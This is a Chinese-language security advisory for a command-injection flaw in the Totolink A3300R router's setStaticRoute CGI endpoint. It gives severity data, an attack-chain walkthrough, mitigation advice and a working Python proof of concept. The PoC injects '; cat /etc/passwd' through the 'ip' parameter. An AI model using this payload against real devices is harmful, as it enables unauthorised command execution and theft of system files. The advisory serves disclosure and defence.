CVE-2026-5104 Totolink A3300R 命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-5104

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink A3300R

漏洞概述

Totolink A3300R路由器固件版本17.0.0cu.557_b20221024中存在安全漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件的setStaticRoute接口未正确过滤用户输入，导致命令注入。攻击者可构造恶意请求，在无需用户交互的情况下远程执行系统命令，可能造成信息泄露、数据篡改及服务中断，建议尽快修复。

技术细节

该漏洞具体存在于Totolink A3300R路由器固件的Web管理组件中。在处理`setStaticRoute`功能时，`/cgi-bin/cstecgi.cgi`脚本接收用户通过HTTP POST请求提交的参数。由于代码逻辑缺陷，程序直接将用户提供的`ip`参数值拼接到系统命令中执行，未进行任何安全过滤或转义处理。这使得攻击者能够利用Shell元字符（如`;`、`|`、反引号）截断原命令并注入恶意操作系统指令。虽然该漏洞利用需要低权限账号（PR:L），但攻击无需用户交互（UI:N）且可远程发起（AV:N）。一旦攻击成功，攻击者即可在设备上以低权限身份执行任意命令，可能导致设备配置被篡改、敏感信息泄露或设备拒绝服务。鉴于相关利用代码已公开，该漏洞具有实际的攻击风险。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出运行固件版本17.0.0cu.557_b20221024的Totolink A3300R设备。

STEP 2

漏洞利用

攻击者向/cgi-bin/cstecgi.cgi发送特制的HTTP POST请求，在setStaticRoute功能的ip参数中注入恶意Shell命令（如`; cat /etc/passwd`）。

STEP 3

命令执行

服务器端CGI脚本未对ip参数进行过滤，直接将其传递给系统Shell执行，导致注入的恶意命令在设备上运行。

STEP 4

后果达成

攻击者成功获取敏感信息或破坏系统完整性，可能导致设备被控制或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual IP)
target_url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"

# Headers mimicking a legitimate browser request
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "*/*"
}

# Payload data demonstrating command injection in the 'ip' parameter
# The payload attempts to execute 'reboot' or 'cat /etc/passwd' via command injection
# Example: 127.0.0.1; cat /etc/passwd
data = {
    "function": "setStaticRoute",
    "ip": "127.0.0.1; cat /etc/passwd",
    "netmask": "255.255.255.0",
    "gateway": "192.168.0.254"
}

try:
    # Sending POST request to the vulnerable endpoint
    response = requests.post(target_url, headers=headers, data=data, timeout=10)
    
    # Checking response status
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

影响范围

Totolink A3300R 17.0.0cu.557_b20221024

防御指南

临时缓解措施

在未完成固件升级前，建议用户通过防火墙规则阻断外部对设备HTTP/HTTPS服务（端口80/443）的访问，仅在局域网内部进行管理。同时，应密切监控设备日志，检测是否存在异常的CGI请求或命令执行行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5104
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5104
3 Details https://www.cvedetails.com/cve/CVE-2026-5104/
4 VulDB https://vuldb.com/cve/CVE-2026-5104
5 Link https://github.com/LvHongW/Vuln-of-totolink_A3300R/tree/main/A3300R_ip_cmd_inject
6 Link https://vuldb.com/submit/779142
7 Link https://vuldb.com/vuln/354129
8 Link https://vuldb.com/vuln/354129/cti
9 Link https://www.totolink.net/